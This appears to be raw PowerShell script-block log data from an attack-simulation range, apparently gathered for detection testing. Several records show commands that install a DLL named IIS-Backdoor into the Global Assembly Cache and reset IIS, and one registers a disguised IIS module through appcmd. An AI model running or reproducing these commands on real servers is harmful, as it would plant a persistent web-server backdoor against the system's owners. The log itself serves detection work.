4104152150x0163088Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-62211new-object system.enterpriseservices.internal.publishf78c940a-72a5-405e-8e91-c859e74fe871
4104152150x0162926Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-62211Set-location "C:\windows\system32\inetsrv"
[System.Reflection.Assembly]::Load("Atomic.System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a")
$publish = New-Object System.EnterpriseServices.Internal.Publish
$publish.GacInstall("c:\windows\system32\inetsrv\IIS-Backdoor.dll")
iisreset
2a5a2da4-28aa-4da3-ba8a-d5c9489b2050
4104152150x0162822Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-62211Set-location "C:\windows\system32\inetsrv"
[System.Reflection.Assembly]::Load("System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a")
$publish = New-Object System.EnterpriseServices.Internal.Publish
$publish.GacInstall("c:\windows\system32\inetsrv\IIS-Backdoor.dll")
iisreset22981287-b894-4316-8991-90da3a5a9f0d
4104152150x0162795Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-62211Set-location "c:\Folder Path"
[System.Reflection.Assembly]::Load("System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a")
$publish = New-Object System.EnterpriseServices.Internal.Publish
$publish.GacInstall("c:\windows\system32\inetsrv\iis-backdoor.dll")
iisreset5f48c83c-f54d-44a2-95ca-e77d4700fa94
4104152150x0162651Microsoft-Windows-PowerShell/Operationalwin-host-mhaag-attack-range-62211powershell.exe /c powershell [System.reflection.assembly]::load ('system.enterpriseservices, version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'); $publish = new-object system.enterpriseservices.internal.publish;$name = (gi d:\system.web.extension.dll).FullName;$Publish.GacInstall($name);$type = 'system.web.extension.extensionmoduke, ' + [system.reflection.assembly]::getassemblyname($name).fullname; if($name-and$type){c:\windows\system32\inetsrv\appcmd.exe add module /name:anonymouscheckmodule /type:"$type"}96faeb81-6596-4db5-99ee-ff0728a5c103